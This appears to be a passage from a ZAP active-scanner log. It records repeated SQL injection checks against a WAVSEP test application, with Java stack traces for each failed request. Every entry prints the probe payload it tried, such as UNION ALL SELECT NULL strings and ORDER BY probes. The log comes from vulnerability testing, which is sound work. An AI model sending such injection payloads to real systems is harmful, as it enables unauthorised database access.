org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682327 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682327 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 2833#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 2833# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682328 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682329 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682329 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682330 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682331 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682331 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682332 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682332 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682334 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682334 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682335 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 